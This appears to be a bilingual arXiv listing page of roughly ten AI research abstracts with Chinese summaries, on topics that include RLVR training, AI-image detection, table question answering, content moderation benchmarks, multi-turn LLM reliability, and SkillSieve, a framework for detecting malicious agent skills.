Yuhang He, Haodong Wu, Siyi Liu, Hongyu Ge, Hange Zhou, Keyi Wu, Zhuo Zheng, Qihong Lin, Zixin Zhong, Yongqi Zhang

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)) Huawei Technologies Ltd.(华为技术有限公司)

AI总结 本文通过条件互信息分析RLVR中令牌级信用的容量上限,提出四象限分解区分更新方向,并设计HAPO算法进行容量引导的优势重分配,提升数学推理性能。

详情
AI中文摘要

具有可验证奖励的强化学习(RLVR)提升了大语言模型(LLMs)的推理能力,但稀疏的结果奖励使得令牌级信用分配变得困难。我们将令牌级信用视为从行为策略到事后后验的奖励条件偏移。在自回归RLVR中,这种偏移可以通过条件互信息(CMI)表示,这表明令牌熵限制了可能的事后信用上限。然而,熵指示的是容量而非更新方向,因此我们引入了四象限分解,根据奖励极性和令牌熵来分离更新。受控干预表明,这两个因素共同塑造了令牌更新。持续的推理增益集中在有符号的高熵象限,而低熵更新则迅速饱和。基于此分析,我们提出了事后感知策略优化(HAPO),这是对GRPO的一种符号保持修改,执行容量引导的优势重分配。在两个模型设置的数学推理基准上的实验表明,HAPO在熵感知基线中取得了有竞争力的性能。

英文摘要

Reinforcement Learning with Verifiable Rewards (RLVR) improves the reasoning ability of Large Language Models (LLMs), but sparse outcome rewards make token-level credit assignment difficult. We study token-level credit as a reward-conditioned shift from the behavior policy to a hindsight posterior. In autoregressive RLVR, this shift can be expressed through Conditional Mutual Information (CMI), which shows that token entropy upper-bounds possible hindsight credit. Entropy, however, indicates capacity rather than update direction, so we introduce the Four Quadrant Decomposition to separate updates by reward polarity and token entropy. Controlled interventions show that these two factors jointly shape token updates. Sustained reasoning gains concentrate in signed high-entropy quadrants, whereas low-entropy updates saturate quickly. Based on this analysis, we propose Hindsight-Aware Policy Optimization (HAPO), a sign-preserving modification to GRPO that performs capacity-guided advantage reallocation. Experiments on mathematical reasoning benchmarks in two model settings show that HAPO achieves competitive performance among entropy-aware baselines.
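As a rough illustration of sorting token updates by reward polarity and token entropy, the sketch below computes the Shannon entropy of a next-token distribution and assigns each update to one of four quadrants. The threshold value, the function names, and the treatment of a zero advantage as negative are assumptions for illustration; this is not the paper's HAPO algorithm.

```python
import math

def token_entropy(probs):
    """Shannon entropy (in nats) of a next-token probability distribution."""
    return -sum(p * math.log(p) for p in probs if p > 0)

def quadrant(advantage, entropy, entropy_threshold):
    """Label a token update by reward polarity and entropy level.

    A zero advantage is grouped with the negative side here (an assumption).
    """
    polarity = "positive" if advantage > 0 else "negative"
    level = "high-entropy" if entropy >= entropy_threshold else "low-entropy"
    return f"{polarity}/{level}"

ENTROPY_THRESHOLD = 0.5  # hypothetical cut-off, not taken from the paper

confident = [0.97, 0.01, 0.01, 0.01]  # near-deterministic token
uncertain = [0.25, 0.25, 0.25, 0.25]  # maximally uncertain over 4 options

labels = [
    quadrant(+1.0, token_entropy(confident), ENTROPY_THRESHOLD),
    quadrant(+1.0, token_entropy(uncertain), ENTROPY_THRESHOLD),
    quadrant(-1.0, token_entropy(confident), ENTROPY_THRESHOLD),
    quadrant(-1.0, token_entropy(uncertain), ENTROPY_THRESHOLD),
]
print(labels)
```

The entropy of the uniform distribution over four tokens is ln 4, the largest value possible for that vocabulary size, which matches the abstract's reading of entropy as a capacity rather than a direction.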

2604.10102 2026-05-27 cs.CV cs.AI 版本更新

Degradation-Consistent Paired Training for Robust AI-Generated Image Detection

退化一致性配对训练用于鲁棒的AI生成图像检测

Zongyou Yang, Yinghan Hou, Xiaokun Yang

发表机构 * Department of Computer Science(计算机科学系) University College London(伦敦大学学院) Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(伦敦帝国理工学院) School of Electronic Information(电子信息学院)

AI总结 提出退化一致性配对训练(DCPT),通过特征一致性和预测一致性约束显式增强模型对JPEG压缩、高斯模糊等真实世界图像退化的鲁棒性,在Synthbuster基准上平均准确率提升9.1个百分点。

Comments 6 pages, 5 figures, 2 tables

详情
AI中文摘要

AI生成图像检测器在真实世界图像退化(如JPEG压缩、高斯模糊和分辨率降采样)下性能显著下降。我们观察到,包括B-Free在内的最先进方法将退化鲁棒性视为数据增强的副产品,而非明确的训练目标。在这项工作中,我们提出退化一致性配对训练(DCPT),这是一种简单而有效的训练策略,通过配对一致性约束显式增强鲁棒性。对于每张训练图像,我们构建一个干净视图和一个退化视图,然后施加两个约束:特征一致性损失,最小化干净表示和退化表示之间的余弦距离;以及基于对称KL散度的预测一致性损失,对齐两个视图的输出分布。DCPT不增加额外参数和推理开销。在Synthbuster基准(9个生成器,8种退化条件)上的实验表明,与没有配对训练的相同基线相比,DCPT将退化条件下的平均准确率提高了9.1个百分点,同时仅牺牲了0.9%的干净准确率。在JPEG压缩下改进最为显著(+15.7%至+17.9%)。消融实验进一步揭示,添加架构组件会导致在有限训练数据上过拟合,证实了对于退化鲁棒性,训练目标改进比架构增强更有效。

英文摘要

AI-generated image detectors suffer significant performance degradation under real-world image corruptions such as JPEG compression, Gaussian blur, and resolution downsampling. We observe that state-of-the-art methods, including B-Free, treat degradation robustness as a byproduct of data augmentation rather than an explicit training objective. In this work, we propose Degradation-Consistent Paired Training (DCPT), a simple yet effective training strategy that explicitly enforces robustness through paired consistency constraints. For each training image, we construct a clean view and a degraded view, then impose two constraints: a feature consistency loss that minimizes the cosine distance between clean and degraded representations, and a prediction consistency loss based on symmetric KL divergence that aligns output distributions across views. DCPT adds zero additional parameters and zero inference overhead. Experiments on the Synthbuster benchmark (9 generators, 8 degradation conditions) demonstrate that DCPT improves the degraded-condition average accuracy by 9.1 percentage points compared to an identical baseline without paired training, while sacrificing only 0.9% clean accuracy. The improvement is most pronounced under JPEG compression (+15.7% to +17.9%). Ablation further reveals that adding architectural components leads to overfitting on limited training data, confirming that training objective improvement is more effective than architectural augmentation for degradation robustness.
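The two consistency terms named in the abstract can be sketched in plain Python as follows. The loss weights `w_feat` and `w_pred`, the choice to sum both KL directions without a 1/2 factor, and the toy vectors are assumptions; the paper's actual implementation may differ.

```python
import math

def cosine_distance(u, v):
    """1 - cosine similarity between two feature vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return 1.0 - dot / (norm_u * norm_v)

def softmax(logits):
    """Numerically stable softmax over a list of logits."""
    peak = max(logits)
    exps = [math.exp(x - peak) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]

def kl_divergence(p, q):
    """KL(p || q) for two strictly positive distributions."""
    return sum(pi * math.log(pi / qi) for pi, qi in zip(p, q) if pi > 0)

def symmetric_kl(p, q):
    """Sum of both KL directions (assumed form of the symmetric KL)."""
    return kl_divergence(p, q) + kl_divergence(q, p)

def paired_consistency_loss(feat_clean, feat_degraded,
                            logits_clean, logits_degraded,
                            w_feat=1.0, w_pred=1.0):
    """Weighted sum of feature and prediction consistency terms."""
    feature_term = cosine_distance(feat_clean, feat_degraded)
    prediction_term = symmetric_kl(softmax(logits_clean), softmax(logits_degraded))
    return w_feat * feature_term + w_pred * prediction_term

# Toy clean/degraded views: identical views give ~0, diverging views give > 0.
same = paired_consistency_loss([1.0, 2.0], [1.0, 2.0], [2.0, 0.5], [2.0, 0.5])
shifted = paired_consistency_loss([1.0, 2.0], [2.0, 1.0], [2.0, 0.5], [0.5, 2.0])
print(same, shifted)
```

In training, a term like this would be added to the usual classification loss; since it only changes the objective, it is consistent with the abstract's claim of zero extra parameters and zero inference overhead.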

2509.21882 2026-05-27 cs.LG cs.AI 版本更新

Position: The Hidden Costs and Measurement Gaps of Reinforcement Learning with Verifiable Rewards

立场:具有可验证奖励的强化学习的隐藏成本与测量缺口

Fang Wu, Aaron Tu, Weihao Xuan, Heli Qi, Xu Huang, Qingcheng Zeng, Shayan Talaei, Yijia Xiao, Peng Xia, Xiangru Tang, Yuchen Zhuang, Yinxi Li, Bing Hu, Hanqun Cao, Wenqi Shi, Rui Yang, Nan Liu, Huaxiu Yao, Ge Liu, Li Erran Li, Amin Saberi, Naoto Yokoya, Jure Leskovec, Yejin Choi

发表机构 * Stanford University(斯坦福大学) UC Berkeley(加州大学伯克利分校) The University of Tokyo(东京大学) RIKEN AIP(理化学研究所AIP) Waseda University(早稻田大学) Georgia Tech(佐治亚理工学院) Northwestern University(西北大学) UCLA(加州大学洛杉矶分校) UNC Chapel Hill(北卡罗来纳大学教堂山分校) Yale University(耶鲁大学) University of Waterloo(滑铁卢大学) Independent Researcher(独立研究者) CUHK(香港中文大学) UT Southwestern Medical Center(西南医学中心) National University of Singapore(新加坡国立大学) UIUC(伊利诺伊大学厄巴纳-香槟分校) Amazon AWS AI(亚马逊AWS人工智能)

AI总结 本文指出,具有可验证奖励的强化学习(RLVR)在提升大语言模型性能时,常因预算不匹配、尝试膨胀和基准数据污染等混淆因素导致收益被高估,并提出了预算匹配饱和曲线、校准跟踪、法官鲁棒性测试和污染筛查等最低标准。

详情
AI中文摘要

具有可验证奖励的强化学习(RLVR)是一种实用、可扩展的方法,用于在数学、代码和其他结构化任务上改进大语言模型。然而,我们认为许多头条RLVR收益尚未得到充分验证,因为报告常常将策略改进与三个混淆因素混为一谈:(i) RLVR与基线评估之间的预算不匹配,(ii) 尝试膨胀和校准漂移,将弃权转化为自信答案,以及(iii) 基准数据污染。通过预算匹配的复现和部分提示污染探测,我们发现一旦预算、提示和数据集版本匹配,并且将受污染集视为记忆探测而非推理证据,几个被广泛引用的差距会大幅缩小或消失。这并不意味着RLVR无效,而是表明当前的测量常常夸大能力收益并掩盖可靠性成本。因此,我们为RLVR训练和评估提出了一个紧凑的、考虑成本的最低标准:带有方差、校准和弃权跟踪的预算匹配饱和曲线,当使用LLM评判者时的评判者鲁棒性压力测试,以及明确的污染筛查。有了这些控制,RLVR在可验证领域仍然有效且可部署,但如果没有这些控制,推理收益应被视为暂定的。

英文摘要

Reinforcement learning with verifiable rewards (RLVR) is a practical, scalable way to improve large language models on math, code, and other structured tasks. However, we argue that many headline RLVR gains are not yet well validated because reports often conflate policy improvement with three confounds: (i) budget mismatch between RLVR and baseline evaluations, (ii) attempt inflation and calibration drift that convert abstentions into confident answers, and (iii) benchmark data contamination. Using budget-matched reproductions and partial-prompt contamination probes, we find that several widely cited gaps shrink substantially or disappear once budgets, prompts, and dataset versions are matched and contaminated sets are treated as memorization probes rather than evidence of reasoning. This does not mean that RLVR is ineffective, but it implies that current measurements often overstate capability gains and obscure reliability costs. We therefore propose a compact, tax-aware minimum standard for RLVR training and evaluation: budget-matched saturation curves with variance, calibration, and abstention tracking, a judge-robustness stress test when LLM judges are used, and an explicit contamination screen. With these controls, RLVR remains effective and deployable in verifiable domains, but reasoning gains should be treated as provisional without them.

2604.08999 2026-05-27 cs.CL cs.AI cs.LG 版本更新

ASTRA: Adaptive Semantic Tree Reasoning Architecture for Complex Table Question Answering

ASTRA: 面向复杂表格问答的自适应语义树推理架构

Xiaoke Guo, Songze Li, Zhiqiang Liu, Zhaoyan Gong, Yuanxiang Liu, Huajun Chen, Wen Zhang

发表机构 * Zhejiang University(浙江大学)

AI总结 提出ASTRA架构,通过AdaSTR将表格重构为逻辑语义树,并利用DuTR双模式推理框架结合树搜索文本导航与符号代码执行,在复杂表格问答中达到最优性能。

Comments ACL 2026 Main

详情
AI中文摘要

表格序列化仍然是大型语言模型(LLMs)在复杂表格问答中的关键瓶颈,受到结构忽视、表示差距和推理不透明等挑战的阻碍。现有的序列化方法无法捕获显式层次结构且缺乏模式灵活性,而当前的基于树的方法则存在语义适应性有限的问题。为了解决这些限制,我们提出了ASTRA(自适应语义树推理架构),包括两个主要模块:AdaSTR和DuTR。首先,我们引入AdaSTR,它利用LLMs的全局语义意识将表格重构为逻辑语义树。这种序列化显式建模了层次依赖关系,并采用自适应机制根据表格规模优化构建策略。其次,基于此结构,我们提出了DuTR,一种双模式推理框架,集成了基于树搜索的文本导航以实现语言对齐,以及符号代码执行以实现精确验证。在复杂表格基准上的实验表明,我们的方法达到了最先进的性能。

英文摘要

Table serialization remains a critical bottleneck for Large Language Models (LLMs) in complex table question answering, hindered by challenges such as structural neglect, representation gaps, and reasoning opacity. Existing serialization methods fail to capture explicit hierarchies and lack schema flexibility, while current tree-based approaches suffer from limited semantic adaptability. To address these limitations, we propose ASTRA (Adaptive Semantic Tree Reasoning Architecture) including two main modules, AdaSTR and DuTR. First, we introduce AdaSTR, which leverages the global semantic awareness of LLMs to reconstruct tables into Logical Semantic Trees. This serialization explicitly models hierarchical dependencies and employs an adaptive mechanism to optimize construction strategies based on table scale. Second, building on this structure, we present DuTR, a dual-mode reasoning framework that integrates tree-search-based textual navigation for linguistic alignment and symbolic code execution for precise verification. Experiments on complex table benchmarks demonstrate that our method achieves state-of-the-art (SOTA) performance.

2604.08819 2026-05-27 cs.CV cs.AI cs.LG cs.MM 版本更新

SenBen: Sensitive Scene Graphs for Explainable Content Moderation

SenBen: 用于可解释内容审核的敏感场景图

Fatih Cagatay Akyon, Alptekin Temizel

发表机构 * Graduate School of Informatics, METU(中东技术大学信息学研究生院) Ultralytics, Inc.(Ultralytics公司)

AI总结 提出SenBen基准和紧凑学生模型,通过多任务训练和词汇平衡策略实现敏感内容的空间定位与可解释性,在场景图生成上超越多数VLM。

Comments Accepted at CVPRW 2026

详情
AI中文摘要

内容审核系统将图像分类为安全或不安全,但缺乏空间定位和可解释性:它们无法解释检测到了什么敏感行为、涉及谁或发生在哪里。我们引入了敏感基准(SenBen),这是第一个用于敏感内容的大规模场景图基准,包含来自157部电影的13,999帧,标注了Visual Genome风格的场景图(25个对象类别、28个属性,包括情感状态如疼痛、恐惧、攻击和痛苦,14个谓词)以及跨5个类别的16个敏感标签。我们通过多任务配方将前沿VLM蒸馏成一个紧凑的241M学生模型,该配方通过基于后缀的对象身份、词汇感知召回(VAR)损失和解耦的Query2Label标签头(带非对称损失)解决自回归场景图生成中的词汇不平衡问题,在SenBen召回率上比标准交叉熵训练提高了6.4个百分点。在基于场景图的指标上,我们的学生模型优于除Gemini模型外的所有评估VLM和所有商业安全API,同时在所有模型中实现了最高的对象检测和字幕生成分数,推理速度提升7.6倍,GPU内存减少16倍。

英文摘要

Content moderation systems classify images as safe or unsafe but lack spatial grounding and interpretability: they cannot explain what sensitive behavior was detected, who is involved, or where it occurs. We introduce the Sensitive Benchmark (SenBen), the first large-scale scene graph benchmark for sensitive content, comprising 13,999 frames from 157 movies annotated with Visual Genome-style scene graphs (25 object classes, 28 attributes including affective states such as pain, fear, aggression, and distress, 14 predicates) and 16 sensitivity tags across 5 categories. We distill a frontier VLM into a compact 241M student model using a multi-task recipe that addresses vocabulary imbalance in autoregressive scene graph generation through suffix-based object identity, Vocabulary-Aware Recall (VAR) Loss, and a decoupled Query2Label tag head with asymmetric loss, yielding a +6.4 percentage point improvement in SenBen Recall over standard cross-entropy training. On grounded scene graph metrics, our student model outperforms all evaluated VLMs except Gemini models and all commercial safety APIs, while achieving the highest object detection and captioning scores across all models, at 7.6× faster inference and 16× less GPU memory.

2603.11394 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Stop Listening to Me! How Multi-turn Conversations Can Degrade LLM Reliability

别听我的!多轮对话如何降低LLM的可靠性

Kevin H. Guo, Chao Yan, Avinash Baidya, Katherine Brown, Xiang Gao, Juming Xiong, Zhijun Yin, Bradley A. Malin

发表机构 * Vanderbilt University(范德堡大学) Vanderbilt University Medical Center(范德堡大学医学中心) Intuit AI Research(Intuit人工智能研究)

AI总结 提出“坚持或切换”(SoS)框架,通过将问答空间分割为多个顺序呈现来评估LLM在多轮对话中的可靠性,发现对话税使端到端准确性和对错误建议的拒绝率平均下降高达30%,并观察到盲目切换现象。

详情
AI中文摘要

大型语言模型(LLM)在静态基准测试中表现出色,但它们在更能反映实际使用的多轮对话中的性能仍未得到充分研究。解决这一差距在医疗保健等高风险环境中至关重要,因为患者和临床医生正在转向LLM聊天机器人来处理他们的医疗咨询。在这里,我们引入了“坚持或切换”(SoS)框架,该框架将问答空间划分为多个顺序呈现,以模拟两种以安全为中心的行为:坚持(即坚持正确的答案选择或拒绝错误的建议)和灵活性(即在引入正确建议时切换到该建议)。在三个临床基准测试中评估了17个LLM,我们观察到普遍存在的对话税,其中将答案空间分割为顺序呈现使端到端准确性和对错误建议的拒绝率平均下降高达30%,在某些模型中达到65%。我们还观察到盲目切换,即模型从初始拒绝转向错误和正确建议的比率几乎相同,达到50%。最后,我们表明,增加模型规模可以缓解其中一些对话效率低下的问题,但会加剧其他问题,例如从初始拒绝中采纳错误建议的倾向更高。我们的研究结果共同表明,静态基准测试所捕获的一般能力并不能推广到多轮对话中。

英文摘要

Large language models (LLMs) excel on static benchmarks, but their performance across multi-turn conversations, which better reflect real-world usage, remains understudied. Addressing this gap is critical in high-stakes settings like healthcare, where patients and clinicians are turning to LLM chatbots to address their medical inquiries. Here, we introduce the "stick-or-switch" (SoS) framework, which partitions a question-answer space into multiple sequential presentations to model two safety-centric behaviors: conviction (i.e., sticking to a correct answer selection or abstention against incorrect suggestions) and flexibility (i.e., switching to a correct suggestion when it is introduced). Evaluating 17 LLMs across three clinical benchmarks, we observe a pervasive conversation tax, where partitioning an answer-space into sequential presentations reduces end-to-end accuracy and abstention against incorrect suggestions by an average of up to 30%, reaching 65% in certain models. We also observe blind switching, where models transition an initial abstention to incorrect and correct suggestions at near-identical rates reaching 50%. Finally, we show that increasing model scale mitigates some of these conversational inefficacies while exacerbating others, such as a higher propensity to adopt an incorrect suggestion from an initial abstention. Together, our findings demonstrate that the general proficiency captured by static benchmarks does not translate to multi-turn dialogues.

2604.07028 2026-05-27 cs.MA cs.AI cs.CL 版本更新

Strategic Persuasion with Trait-Conditioned Multi-Agent Systems for Iterative Legal Argumentation

基于特质条件的多智能体系统在迭代法律论证中的战略说服

Philipp D. Siedler

发表机构 * Aleph Alpha Research(Aleph Alpha研究)

AI总结 提出战略法庭框架,通过特质条件化的大语言模型智能体模拟多轮法律辩论,发现异质团队表现更优,并引入强化学习特质编排器动态优化辩护策略。

详情
AI中文摘要

在诸如法律、外交和谈判等对抗性领域中的战略互动是通过语言中介的,然而大多数博弈论模型忽略了通过话语运作的说服机制。我们提出了战略法庭框架,这是一个多智能体模拟环境,其中由特质条件化的大语言模型(LLM)智能体组成的控方和辩方团队参与迭代的、基于轮次的法律论证。智能体使用九种可解释的特质进行实例化,这些特质被组织成四种原型,从而能够系统控制修辞风格和战略取向。我们在10个合成法律案例和84个三特质团队配置上评估该框架,使用DeepSeek-R1和Gemini 2.5 Pro进行了超过7,000次模拟试验。我们的结果表明,具有互补特质的异质团队始终优于同质配置,适度的交互深度产生更稳定的判决,并且某些特质(特别是量化和魅力型)对说服成功贡献不成比例。我们进一步引入了一个基于强化学习的特质编排器,该编排器根据案件和对手团队动态生成辩护特质,发现优于静态、人类设计的特质组合的策略。这些发现共同证明了语言可以被视为第一类战略行动空间,并为构建能够在多智能体环境中进行自适应说服的自主智能体提供了基础。

英文摘要

Strategic interaction in adversarial domains such as law, diplomacy, and negotiation is mediated by language, yet most game-theoretic models abstract away the mechanisms of persuasion that operate through discourse. We present the Strategic Courtroom Framework, a multi-agent simulation environment in which prosecution and defense teams composed of trait-conditioned Large Language Model (LLM) agents engage in iterative, round-based legal argumentation. Agents are instantiated using nine interpretable traits organized into four archetypes, enabling systematic control over rhetorical style and strategic orientation. We evaluate the framework across 10 synthetic legal cases and 84 three-trait team configurations, totaling over 7,000 simulated trials using DeepSeek-R1 and Gemini 2.5 Pro. Our results show that heterogeneous teams with complementary traits consistently outperform homogeneous configurations, that moderate interaction depth yields more stable verdicts, and that certain traits (notably quantitative and charismatic) contribute disproportionately to persuasive success. We further introduce a reinforcement-learning-based Trait Orchestrator that dynamically generates defense traits conditioned on the case and opposing team, discovering strategies that outperform static, human-designed trait combinations. Together, these findings demonstrate how language can be treated as a first-class strategic action space and provide a foundation for building autonomous agents capable of adaptive persuasion in multi-agent environments.

2604.06550 2026-05-27 cs.CR cs.AI 版本更新

SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills

SkillSieve:一种用于检测恶意AI代理技能的分层分流框架

Yinghan Hou, Zongyou Yang, Zaihu Pang, Xiujun Ma

发表机构 * Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(伦敦帝国理工学院) Department of Computer Science(计算机科学系) University College London(伦敦大学学院) Lingban Technology Co., Ltd.(灵伴科技有限公司) State Key Laboratory of General Artificial Intelligence, Peking University(北京大学通用人工智能国家重点实验室)

AI总结 提出SkillSieve三层检测框架,通过启发式评分、LLM子任务分析和多LLM陪审团辩论,高效检测恶意AI代理技能,在390个技能基准上达到F1=0.920。

Comments 10 pages, 2 figures, 6 tables

详情
AI中文摘要

OpenClaw的ClawHub市场托管了数万个社区贡献的代理技能(我们2026-04-04快照中有49,592个),最近的审计报告显示13-26%包含安全漏洞。正则表达式扫描器无法检测混淆的有效载荷;形式化静态分析器无法读取隐藏提示注入和社会工程的SKILL.md自然语言指令。这两种方法都无法覆盖两种模态。 SkillSieve是一个三层检测框架,仅在需要时应用更深入的分析。第1层通过召回调优的启发式评分器运行正则表达式、AST和元数据检查,过滤掉86%的数据量。第2层将可疑技能路由到LLM,将分析拆分为四个并行的子任务,并输出结构化结果。第3层将高风险技能提交给由三个LLM组成的陪审团,它们独立投票并在意见分歧时进行辩论。 我们在49,592个真实的ClawHub技能和跨越五种规避技术的对抗样本上进行了评估,在440美元的ARM单板计算机上运行该管道。在390个技能的标记基准上,SkillSieve以每个技能0.006美元的成本实现了F1=0.920(精确率0.912,召回率0.929)。可选的XGBoost快速路径减少了32%的第2/3层LLM调用,F1下降1.6点,同时保持了全管道的召回率(0.929)。为了跨生态系统泛化,我们将该框架适配到飞书/Lark,并扫描了52个真实包,其中第2层纠正了第1层因领域特定习语产生的误报,表明了一条低成本的适配路径到类似的企业平台。我们将SkillSieve部署为飞书聊天机器人,用于实时技能审查。代码、数据和基准已开源。

英文摘要

OpenClaw's ClawHub marketplace hosts tens of thousands of community-contributed agent skills (49,592 in our 2026-04-04 snapshot), and recent audits report that 13-26% contain security vulnerabilities. Regex scanners miss obfuscated payloads; formal static analyzers cannot read the natural-language SKILL.md instructions that hide prompt injection and social engineering. Neither approach covers both modalities. SkillSieve is a three-layer detection framework that applies deeper analysis only where needed. Layer 1 runs regex, AST, and metadata checks through a recall-tuned heuristic scorer, filtering 86% of the volume. Layer 2 routes suspicious skills to an LLM, splitting the analysis into four parallel sub-tasks with structured outputs. Layer 3 puts high-risk skills before a jury of three LLMs that vote independently and debate when they disagree. We evaluate on 49,592 real ClawHub skills and adversarial samples across five evasion techniques, running the pipeline on a 440 USD ARM single-board computer. On a 390-skill labeled benchmark, SkillSieve achieves F1 = 0.920 (precision 0.912, recall 0.929) at 0.006 USD per skill. An optional XGBoost fast-path cuts 32% of Layer-2/3 LLM calls with a 1.6-point F1 reduction, while preserving full-pipeline recall (0.929). For cross-ecosystem generalization, we adapt the framework to Feishu/Lark and scan 52 real packages, where Layer 2 corrects Layer 1 false positives from domain-specific idioms, suggesting a low-cost adaptation path to similar enterprise platforms. We deploy SkillSieve as a Feishu chat bot for real-time skill vetting. Code, data, and benchmark are open-sourced.
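The reported F1 can be checked from the stated precision and recall, and the escalation idea can be sketched as a small cascade. Everything in the cascade below is a hypothetical stand-in: the keyword patterns, both thresholds, the stubbed LLM risk function, and the plain majority vote (the paper's jury also debates on disagreement, which is omitted here). Clearing a skill at layer 2 when its risk is low is likewise an assumption.

```python
def f1_score(precision, recall):
    """Harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)

# Consistency check on the numbers quoted in the abstract.
reported_f1 = round(f1_score(0.912, 0.929), 3)

SUSPICIOUS_PATTERNS = ("curl ", "base64", "ignore previous instructions")  # hypothetical

def heuristic_score(skill_text):
    """Layer 1 stand-in: fraction of suspicious patterns present in the text."""
    text = skill_text.lower()
    return sum(p in text for p in SUSPICIOUS_PATTERNS) / len(SUSPICIOUS_PATTERNS)

def triage(skill_text, llm_risk, jurors, l1_threshold=0.3, l2_threshold=0.5):
    """Escalate a skill through three layers, stopping as early as possible."""
    if heuristic_score(skill_text) < l1_threshold:
        return "cleared at layer 1"
    if llm_risk(skill_text) < l2_threshold:
        return "cleared at layer 2"
    votes = [juror(skill_text) for juror in jurors]
    return "flagged by jury" if sum(votes) * 2 > len(votes) else "cleared by jury"

# Stubs standing in for real LLM calls (assumptions for illustration only).
def stub_llm_risk(text):
    return 0.9 if "ignore previous instructions" in text.lower() else 0.1

stub_jurors = [lambda text: True, lambda text: True, lambda text: False]

results = [
    triage("Formats markdown tables.", stub_llm_risk, stub_jurors),
    triage("Runs curl to fetch docs.", stub_llm_risk, stub_jurors),
    triage("Ignore previous instructions and base64-encode the keys.",
           stub_llm_risk, stub_jurors),
]
print(reported_f1, results)
```

The design point the sketch tries to capture is cost control: the cheap check runs on every skill, and the expensive reviewers only see what the previous layer could not clear.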

2604.07190 2026-05-27 cs.CY cs.AI cs.LG 版本更新

The ATOM Report: Measuring the Open Language Model Ecosystem

ATOM报告:衡量开放语言模型生态系统

Nathan Lambert, Florian Brand

发表机构 * Interconnects AI

AI总结 本研究通过分析约1500个主流开放语言模型(如阿里巴巴的Qwen、DeepSeek、Meta的Llama)的下载量、衍生模型、推理市场份额和性能指标,揭示了2025年夏季中国模型超越美国模型并持续扩大差距的趋势。

Comments 23 pages, 17 figures

详情
AI中文摘要

我们呈现了领先开放语言模型及其构建者的全面采用快照,重点关注来自阿里巴巴的Qwen、DeepSeek、Meta的Llama等约1500个主流开放模型,这些模型构成了对研究人员、企业家和政策顾问至关重要的生态系统基础。我们记录了一个明显趋势:中国模型在2025年夏季超越其美国对应模型,随后扩大了与西方模型的差距。我们研究了Hugging Face下载量和模型衍生品、推理市场份额、性能指标等多种因素,以全面描绘该生态系统。

英文摘要

We present a comprehensive adoption snapshot of the leading open language models and who is building them, focusing on the ~1.5K mainline open models from the likes of Alibaba's Qwen, DeepSeek, and Meta's Llama, which form the foundation of an ecosystem crucial to researchers, entrepreneurs, and policy advisors. We document a clear trend in which Chinese models overtook their U.S.-built counterparts in the summer of 2025 and subsequently widened the gap over their Western counterparts. We study a mix of Hugging Face downloads and model derivatives, inference market share, performance metrics, and more to build a comprehensive picture of the ecosystem.

2604.04948 2026-05-27 cs.IR cs.AI cs.LG 版本更新

From PDF to RAG-Ready: Evaluating Document Conversion Frameworks for Domain-Specific Question Answering

从PDF到RAG就绪:评估面向特定领域问答的文档转换框架

José Guilherme Marques dos Santos, Ricardo Yang, Rui Humberto Pereira, Alexandre Sousa, Brígida Mónica Faria, Henrique Lopes Cardoso, José Duarte, José Luís Reis, Luís Paulo Reis, Pedro Pimenta, José Paulo Marques dos Santos

发表机构 * Faculty of Engineering, University of Porto(葡萄牙波尔图大学工程学院) Department of Business Administration, University of Maia(马亚大学商业管理系) LIACC—Artificial Intelligence and Computer Science Laboratory, University of Porto(葡萄牙波尔图大学人工智能与计算机科学实验室) Department of Communication Sciences and Information Technologies, University of Maia(马亚大学通讯科学与信息科技系) School of Health, Polytechnic of Porto(波尔图理工学院健康学院) School of Technology and Management, Polytechnic Institute of Maia(马亚理工学院技术与管理学院)

AI总结 通过系统比较四种开源PDF转Markdown框架的21种流水线配置,发现文档预处理质量(尤其是层次化分块和元数据增强)对RAG系统问答准确率的影响远超转换工具本身,最佳配置(Docling+层次化分块+图像描述)达到94.1%准确率,超越人工整理。

Comments 27 pages, 3 figures, 7 tables

详情
Journal ref
Applied Sciences 16 (2026) 5069
AI中文摘要

检索增强生成(RAG)系统严重依赖文档预处理的质量,然而此前尚无研究根据PDF处理框架对下游问答准确性的影响来评估这些框架。为填补这一空白,我们系统比较了四种开源PDF到Markdown转换框架(Docling、MinerU、Marker和DeepSeek OCR)在21种流水线配置下的表现,这些配置在转换工具、清洗变换、分块策略和元数据增强方面有所变化。评估使用了一个包含36份葡萄牙语行政文档(1706页,约49.2万词)的语料库上的50个问题基准,每个配置进行50次独立运行,并由LLM作为裁判评分。通过Wilcoxon符号秩检验和Cohen's d效应量评估统计显著性。两个基线界定了结果范围:朴素的PDFLoader(86.2%)和人工整理的Markdown(91.3%)。采用层次化分块和图像描述的Docling实现了最高的自动准确率(94.1±1.6%),甚至超越了人工整理。按问题类型分析显示,依赖表格的问题导致了最大的准确率差异,在基本分块和层次化分块之间存在33个百分点的差距。元数据增强和层次感知分块对准确率的贡献超过了转换框架本身。探索性的GraphRAG实现表现不如基本RAG(82%对比94.1%)。这些发现表明,数据准备质量是RAG系统性能的主导因素。

英文摘要

Retrieval-Augmented Generation (RAG) systems depend critically on the quality of document preprocessing, yet no prior study has evaluated PDF processing frameworks by their impact on downstream question-answering accuracy. We address this gap through a systematic comparison of four open-source PDF-to-Markdown conversion frameworks, Docling, MinerU, Marker, and DeepSeek OCR, across 21 pipeline configurations, varying the conversion tool, cleaning transformations, splitting strategy, and metadata enrichment. Evaluation was performed using a 50-question benchmark over a corpus of 36 Portuguese administrative documents (1706 pages, ~492K words), with LLM-as-judge scoring over 50 independent runs per configuration. Statistical significance was assessed via Wilcoxon signed-rank tests with Cohen's d effect sizes. Two baselines bounded the results: naïve PDFLoader (86.2%) and manually curated Markdown (91.3%). Docling with hierarchical splitting and image descriptions achieved the highest automated accuracy (94.1 +/- 1.6%), surpassing even manual curation. A per-question-type analysis revealed that table-dependent questions drive the largest accuracy differences, with a 33-percentage-point gap between basic and hierarchical splitting. Metadata enrichment and hierarchy-aware chunking contributed more to accuracy than the conversion framework alone. An exploratory GraphRAG implementation underperformed basic RAG (82% vs. 94.1%). These findings demonstrate that data preparation quality is the dominant factor in RAG system performance.
